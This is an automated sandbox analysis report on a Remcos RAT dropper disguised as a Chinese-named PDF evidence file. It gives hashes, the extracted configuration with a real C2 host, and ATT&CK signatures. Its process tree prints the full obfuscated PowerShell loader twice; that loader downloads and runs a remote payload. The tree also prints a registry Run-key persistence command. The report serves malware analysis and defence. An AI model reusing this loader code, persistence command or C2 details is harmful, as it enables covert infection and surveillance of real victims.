Resubmissions

30-11-2024 11:20

241130-nfmpfssmhx 10

30-11-2024 03:54

241130-egqm3avqhq 10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 03:54

General

  • Target

    證據_89004161-000002102-66_20241128·pdf.vbs

  • Size

    33KB

  • MD5

    b87c82bba48c44f8fc387ecd6100ff0e

  • SHA1

    2cdcb7b8b4f5a8b0501a121b6b4264aa7c6b2f57

  • SHA256

    20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509

  • SHA512

    442d105706dcc997c39a141d7a944bbb961e8948d15caee81814f1a6d6245e46b00bf98e893c1623bd92b12b1ac440432fd26f4fd9166c5ffea8ac9a575af189

  • SSDEEP

    768:5KSasMUqkx36r142byXNoPNhZqpCtHki2ynMVVX09rkFJC:ISas/RF6hWyPN/MbZ09oFM

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\證據_89004161-000002102-66_20241128·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1032
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2504

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    bed4f9893354bc8a0abc144c06cfa7e4

    SHA1

    d2012666990e8992d6074e8ec32991fe1cdfaab0

    SHA256

    25e6f9dfbef95a9f43a6ea31f79fd221d0e5b918ad07540d216faed6dbb9ca4d

    SHA512

    e4fae067cbfb7d2b5a784bad08e11afb246947a5ce8e024f1cb49ff6252bf35e18531a24edb406dcb0467091548650a9f2c7e401b1f6956b61518df92e0abe73

  • C:\Users\Admin\AppData\Local\Temp\CabB3E6.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar405B.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Epitympanum.Ply

    Filesize

    404KB

    MD5

    02520ab781931d06c03af0071b4cbe02

    SHA1

    1a35dae7b75807fb4cb35e06ee57cba219710491

    SHA256

    dd89e82b3e8fd742b6c039805c442693d61d25dfcd3804bc0d2ad19ff0d0e0e8

    SHA512

    27f47814f3061d9c86e1cd6654d8b9e3f1ccbf38ce1379f88a946ff4e0e4a16c32300f7541b6098bc03a14752cfe780b4b5efde8ec740522d113dffd838dae9e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UIH92QERTBQ9BHKPVDVO.temp

    Filesize

    7KB

    MD5

    06fa667713822ed3177a9fa6c5e7d356

    SHA1

    90d3e05c32ce1b0b0c582e54ed4cdb564336f1da

    SHA256

    34c082831e8090b2de02fcc4ab8c1cd6d9331c535d71a9ee41ae30ce7b052ea5

    SHA512

    166d3a19dbadc42f4abf7fc5d56a867c4ed6e678b47a2102a80ece71637649e5e83a5b02184162a21dc25e167077c47d25a82f606071654827918a4c32ab8e6b

  • memory/1032-29-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-33-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-26-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-27-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-28-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/1032-25-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-31-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-24-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-23-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-22-0x0000000001E00000-0x0000000001E08000-memory.dmp

    Filesize

    32KB

  • memory/1032-20-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/1032-21-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/1924-60-0x00000000002D0000-0x0000000001332000-memory.dmp

    Filesize

    16.4MB

  • memory/1924-62-0x00000000002D0000-0x0000000001332000-memory.dmp

    Filesize

    16.4MB

  • memory/3056-37-0x0000000006580000-0x00000000098C3000-memory.dmp

    Filesize

    51.3MB